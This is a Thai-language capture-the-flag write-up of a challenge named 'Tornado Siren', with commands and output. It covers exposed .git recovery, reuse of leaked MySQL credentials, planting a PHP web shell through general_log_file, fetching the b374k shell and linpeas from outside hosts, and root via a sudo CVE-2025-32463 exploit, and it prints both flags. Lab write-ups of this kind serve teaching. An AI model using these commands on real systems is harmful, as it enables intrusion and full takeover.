TORNADO SIREN

tornado-siren-img-1

โจทย์นี้คือโครตท้าทายมาก เพราะมีการกันหนาพอตัว แต่ก็สามารถเอา Flag ทั้ง 2 ออกมาได้ OwO

หาทางเข้า Database

ทีนี้มาเริ่มหากันเลยดีว่า ~

tornado-siren-img-2

พอเปิดหน้าเว็บมาก็นึกโจทย์ “Rain or rain” ขึ้นมาก็เลยลอง Injection เข้าไปดู

tornado-siren-img-2

เอ๋ โจมตีไม่ได้หรอ แบบนี้งานยากซะแล้วสิ O-O! แล้วทำยังไงทีละ

ด้วยความที่ลองทั้ง Inspect code หรือเช็ค HTTP Request แล้วก็ไม่มีช่องโหว่ไหนโผล่ออกมาเลยแฮ่ะ จึงลองใช้ ffuf ในการสแกนดูว่าจะเจอ Path อะไรแปลก ๆ

1
mrwan2546@macbook Downloads % ffuf -w ./common.txt -recursion -u  http://172.18.0.35/FUZZ
2

3
        /'___\  /'___\           /'___\
4
       /\ \__/ /\ \__/  __  __  /\ \__/
5
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
6
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
7
         \ \_\   \ \_\  \ \____/  \ \_\
8
          \/_/    \/_/   \/___/    \/_/
9

10
       v2.1.0-dev
11
________________________________________________
12

13
 :: Method           : GET
14
 :: URL              : http://172.18.0.35/FUZZ
15
 :: Wordlist         : FUZZ: /Users/mrwan2546/Downloads/common.txt
16
 :: Follow redirects : false
17
 :: Calibration      : false
18
 :: Timeout          : 10
19
 :: Threads          : 40
20
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
21
________________________________________________
22

23
.git                    [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 27ms] <- ???
24
[INFO] Adding a new job to the queue: http://172.18.0.35/.git/FUZZ
25
...

เอ๊ะ นั่นมัน .git file นิ หรือว่าอาจมีการดึงข้อมูลจาก GitHub ออกมาได้ ซึ่งโดยตามปกติแล้ว GitHub จะสามารถ restore file ได้ แต่ว่า… ทำยังไงหว่า 5555

ก็เลยไปหาดูไปเจอบทความนี้มา https://captainnoob.medium.com/source-code-disclosure-via-exposed-git-folder-d22919c590a2

พอเจอแบบนี้แล้วก็ทำการดึง .git folder ลงมาทั้งก้อนซะเลย!

1
wget --mirror -I .git http://172.18.0.35/.git/

1
mrwan2546@macbook 172.18.0.35 % git status
2
On branch master
3
Changes not staged for commit:
4
  (use "git add/rm <file>..." to update what will be committed)
5
  (use "git restore <file>..." to discard changes in working directory)
6
        deleted:    bak.php
7
        deleted:    index.php
8

9
no changes added to commit (use "git add" and/or "git commit -a")

อื้ม! เหมือนจะเจอแล้วละ ต่อไปจะทำการ git restore เพื่อกู้คืน File content git ที่หายไป

1
mrwan2546@macbook 172.18.0.35 % git restore .
2
mrwan2546@macbook 172.18.0.35 % ls -la
3
total 24
4
drwxr-xr-x   5 mrwan2546  staff   160 Sep 14 12:00 .
5
drwxr-xr-x   5 mrwan2546  staff   160 Sep 14 11:58 ..
6
drwxr-xr-x  22 mrwan2546  staff   704 Sep 14 12:00 .git
7
-rw-r--r--   1 mrwan2546  staff   226 Sep 14 12:00 bak.php
8
-rwxr-xr-x   1 mrwan2546  staff  6589 Sep 14 12:00 index.php
9
mrwan2546@macbook 172.18.0.35 %

ได้มาแล้ว! ทีนี้ไหนลองดูซิ๊ว่าด้านไหน index.php ว่ามีอะไรบ้าง

1
<?php
2
declare(strict_types=1);
3

4
// ======= DB CONFIG =======
5
$DB_HOST = '127.0.0.1';
6
$DB_NAME = 'dev_tornado_siren';
7
$DB_USER = 'devlnw';     // แก้ให้ตรงเครื่องคุณ
8
$DB_PASS = 'RaciNovEroAsHierSHanTemiNETeL';         // แก้ให้ตรงเครื่องคุณ
9
$DSN = "mysql:host={$DB_HOST};dbname={$DB_NAME};charset=utf8mb4";
10

11
...

เหมือนเจอ User & Pass ของ MySQL แฮ่ะ งั้น.. แสดงว่า.. มันสามารถเข้าผ่าน Port 3306 ของ MySQL ได้ งั้นลองดูหน่อยซิ๊

1
mrwan2546@macbook ~ % mysql -h 172.18.0.35 -u devlnw -p -D dev_tornado_siren
2
Enter password:
3
Reading table information for completion of table and column names
4
You can turn off this feature to get a quicker startup with -A
5

6
Welcome to the MySQL monitor.  Commands end with ; or \g.
7
Your MySQL connection id is 57
8
Server version: 5.5.5-10.11.13-MariaDB-0ubuntu0.24.04.1 Ubuntu 24.04
9

10
Copyright (c) 2000, 2025, Oracle and/or its affiliates.
11

12
Oracle is a registered trademark of Oracle Corporation and/or its
13
affiliates. Other names may be trademarks of their respective
14
owners.
15

16
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
17

18
mysql>

เย้! เข้ามาได้แล้ว!

หาทางเข้า Shell

ทีนี้พอเราเข้ามาได้แล้ว ไหนลองเช็คดูว่ามี flag ซ่อนในนี้ไหม

mysql> SHOW TABLES;
+-----------------------------+
| Tables_in_dev_tornado_siren |
+-----------------------------+
| dev_test_user               |
| tornado_observations        |
+-----------------------------+
2 rows in set (0.019 sec)

mysql>

อืมมม ไม่มีเลยแฮ่ะ แต่เอ๊ะ! อะไรคือ dev_test_user ก็เลยลองเข้าไปดู

mysql> select * from dev_test_user;
+----+----------+----------+---------------------+
| id | username | password | created_at          |
+----+----------+----------+---------------------+
|  1 | devlnw   | lnwza888 | 2025-09-14 04:55:32 |
+----+----------+----------+---------------------+
1 row in set (0.020 sec)

mysql>

เหมือนเป็น User & Pass ทางเข้าอะไรสักอย่าง เดียวเก็บไว้ก่อนละกัน

1
Username: devlnw
2
Password: lnwza888

แล้วทีนี้จะเข้าไปเครื่องยังไงดีกันนะ เพราะลองเช็คแล้วเหมือนจะหา Flag อะไรในนั้นแทบไม่ได้เลยแฮ่ะ ทีนี้นึกขึ้ได้ว่า เราสามารถเขียน File เข้าไปใน MySQL เพื่อให้เขียน File ออกมาได้

mysql> SELECT '<?php system("id")' INTO OUTFILE '/var/www/html/shell.php';
ERROR 1045 (28000): Access denied for user 'devlnw'@'%' (using password: YES)

เอ๋ ไม่ได้แฮ่ะ โดน Access denied เฉยเลย ;w; แล้วลองเขียนแบบ system ไปแบบโต้ง ๆ ดู

mysql> system id
ERROR: 'system' command received, but the --system-command option is off. Skipping.

แล้วจะเข้าไป Shell ได้ยังไงนิ ติดแบบนี้

แต่นึกขึ้นได้อีกอย่าง MySQL มันมีสิ่งที่เรียกว่าเขียน Log file ขึ้นมานิ ทีนี้ลองไปค้นข้อมูลมาว่า “เราสามารถ Overwrite path logging ได้” ซึ่งตอนนั้นนึกว่ามันจะได้หรอ ก็เลยลองดู

1
mysql> SET GLOBAL general_log_file = '/var/www/html/shell.php';
2
Query OK, 0 rows affected (0.022 sec)
3

4
mysql> SET GLOBAL log_output = 'FILE';
5
Query OK, 0 rows affected (0.018 sec)
6

7
mysql> SET GLOBAL general_log = 'ON';
8
Query OK, 0 rows affected (0.020 sec)
9

10
mysql> SELECT "<?php system($_GET['cmd']) ;?>";
11
+--------------------------------+
12
| <?php system($_GET['cmd']) ;?> |
13
+--------------------------------+
14
| <?php system($_GET['cmd']) ;?> |
15
+--------------------------------+
16
1 row in set (0.019 sec)
17

18
mysql> SET GLOBAL general_log = 'OFF';
19
Query OK, 0 rows affected (0.024 sec)
20

21
mysql>

ทีนี้ลองเข้าเว็บตามที่เขียนดูตามลิ้งก์ http://172.18.0.35/shell.php?cmd=whoami

1
/usr/sbin/mariadbd, Version: 10.11.13-MariaDB-0ubuntu0.24.04.1 (Ubuntu 24.04). started with: Tcp port: 3306 Unix socket: /run/mysqld/mysqld.sock Time Id Command Argument 250914 5:10:38 57 Query SELECT "www-data" 250914 5:10:41 57 Query SET GLOBAL general_log = 'OFF'

เฮ้ย! ได้ไง O-O!!! ทำแบบนี้ได้ด้วยหรอ ก็เลยลองทำท่าเหมือนโจทย์ TEMPEST POST OFFICE ดูโดยการใช้ ncat ควบคุมดู

tornado-siren-img-4

เงียบกริบ… ทำไมไม่ได้กันนะ?

ก็เลยลองหาท่าอื่นดู โดยการจะฝัง PHP b374k เพื่อให้สร้าง Bind shell ออกมาด้านนอก โดยการโหลดไฟล์ลงมาก่อน

ป้อนคำสั่ง wget เพื่อ Download script ลงมา

1
http://172.18.0.35/shell.php?cmd=wget%20-O%20attack.php%20https://webshell.org/b374k-shell.txt

จากนนั้นเข้าผ่านเว็บ http://172.18.0.35/attack.php

tornado-siren-img-5

แหม่ ~ ไม่ได้เจอหน้านี้นามา— อุ่ย 5555 กลับเข้าเรื่องก่อน

ทีนี้จะใช้ Bind shell เพื่อเข้า Shell ของเครื่อง

tornado-siren-img-6

ตอนนี้เข้ามาใน Shell ได้สำเร็จแล้ว! ทีนี้ได้เวลาล่า Flag กัน!

หา Flag อันที่ #1

เรามาหา Flag แรกกัน

เราก็จะเช็คก่อนว่า Flag ซ่อนไว้ไหนโดยใช้โจทย์คล้าย ๆ กับ “TEMPEST POST OFFICE” เพื่อดู File /random.sh

# เส้นทางไฟล์ปลายทาง
f1="/home/devlnw/flag.txt"
f2="/root/flag.txt"

เอาละเราเจอแหล่งไฟล์ flag.txt โดยจะซ่อนอยู่ในทั้ง /home/devlnw/flag.txt และ /root/flag.txt

ทีนี้ลองอ่านดูว่าอ่านได้ไหม

1
cat: /home/devlnw/flag.txt: Permission denied

อ่านไมไม่ได้แฮ่ะ แล้วลองเข้า User devlnw ดู

1
/var/www/html>su devlnw
2
Password: ??
3
su: Authentication failure

แล้วรหัสอะไรละ? แต่เอ๊ะ! เหมือน User นี้จะเจอใน Database ก่อนหน้านี้เลย

งั้นแสดงว่า… นั้นคือ Password สำหรันเข้า User devlnw สินะ

1
/var/www/html>su devlnw
2
Password: lnwza888
3
id
4
uid=1001(devlnw) gid=1001(devlnw) groups=1001(devlnw)

สรุปเข้าได้จริงด้วย! งั้นไปเอา Flag อันที่ 1 กัน!

1
cat /home/devlnw/flag.txt
2
TEMPEST{22455c611d206a5e6e500631828a8c9f}
3
exit

ได้มาแล้ว! >w< “

1
TEMPEST{22455c611d206a5e6e500631828a8c9f}

หา Flag อันที่ #2

ต่อไปงานหินแล้วละ Flag อันที่ 2 อันนั้นอยู่ใน root account ซึ่งเราไม่สามารถจะไปอ่านตรง ๆ กันได้ โดยได้ลองเข้าไป sudo เพือเข้า User root โดยตรงแต่…

1
/var/www/html>sudo -S su -
2

3
We trust you have received the usual lecture from the local System
4
Administrator. It usually boils down to these three things:
5

6
    #1) Respect the privacy of others.
7
    #2) Think before you type.
8
    #3) With great power comes great responsibility.
9

10
For security reasons, the password you type will not be visible.
11

12
Password: ???
13
Sorry, try again.
14
Password: ???
15
Sorry, try again.
16
Password: QwQ
17
sudo: 3 incorrect password attempts
18
/var/www/html>

รหัสอะไร ;w; เราก็ไม่รู้อีกว่า www-data คืออะไร เพราะโดยปกติแล้ว www-data จะไม่ต้องป้อนรหัสอะไรเลย ก็สามารถเข้าไปได้โดยตรง

/var/www/html>cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin <- ไมต้อง Login
...
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
devlnw:x:1001:1001::/home/devlnw:/bin/bash
...
/var/www/html>

ทีนี้ก็นั่งงมหลายชั่วโมงมาก จนกระทั่งไปเจอ Tool นี้มา https://github.com/peass-ng/PEASS-ng (ขอบคุณ Krits ที่ช่วยหา)

เป็นอุปกรณ์ที่ช่วยสแกนค้นหาช่องโหว่ที่เป็นไปได้ โดยความเป็นไปได้สูงสุดจะขึ้นสีแดง

หลังลองสแกนเจอสิ่งนี้

1
/var/www/html>curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
2
...
3

4
-rwsr-xr-x 1 root root 40K May 30  2024 /usr/bin/newgrp  --->  HP-UX_10.20
5
-rwsr-xr-x 1 root root 72K May 30  2024 /usr/bin/chfn  --->  SuSE_9.3/10
6
-rwsr-xr-x 1 root root 44K May 30  2024 /usr/bin/chsh
7
-rwsr-xr-x 1 root root 75K May 30  2024 /usr/bin/gpasswd
8
-rwsr-xr-x 1 root root 1019K Sep  8 20:31 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
9

10
...

เหมือนตัว PRESS-ng เจอว่า sudo จะมีช่องโหว่ที่สามารถทำอะไรได้สักอย่าง ก็เลยลองเช็ค Version ดูและค้นหา ปรากฏว่า

tornado-siren-img-7

เป็น CVE-2025-32463 ที่สามารถยกสิทธิ์ตัวเราเป็น root ได้โดยการใช้ chroot โจมตี ซึ่งระดับความอันตรายอยู่ที่ 9.3 ถือว่าอันตรายสุด! ทำให้ผมอึ้งไปสักพักเลย O-O!!!

ทีนี้ก็ลองค้นหาตัว CVE นี้ ก็ไปเจอ Script นี้มา: https://github.com/pr0v3rbs/CVE-2025-32463_chwoot

เป็นการปรับ GUID และ UID ให้เป็น 0 เพื่อปรับสิทธิตัวเองเป็น root User และใช้ sudo เพื่อยกสิทธิ์อีกที

ทีนี้ลองโจมตีกัน

/var/www/html>curl https://raw.githubusercontent.com/pr0v3rbs/CVE-2025-32463_chwoot/refs/heads/main/sudo-chwoot.sh > sudo-chwoot.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1046  100  1046    0     0   2306      0 --:--:-- --:--:-- --:--:--  2303
/var/www/html>chmod +x ./sudo-chwoot.sh
/var/www/html>./sudo-chwoot.sh
woot!
id
uid=0(root) gid=0(root) groups=0(root),33(www-data) <-- !!!!

เฮ้ยยย O-O!!!! ยกสิทธิ์ได้จริงด้วย! โครตตกใจจริงที่สามารถยกสิทธิ์ได้แบบนี้เลย แต่ใจเย็น ๆ ก่อน เป้าหมายเราคือหา Flag อันที่ 2 ก่อน

1
ls /root
2
flag.txt
3
cat /root/flag.txt
4
TEMPEST{853d667ecda1b5e5f6cd28ce6c9b7c5a}

เย้! ได้มาแล้ว!!!

1
TEMPEST{853d667ecda1b5e5f6cd28ce6c9b7c5a}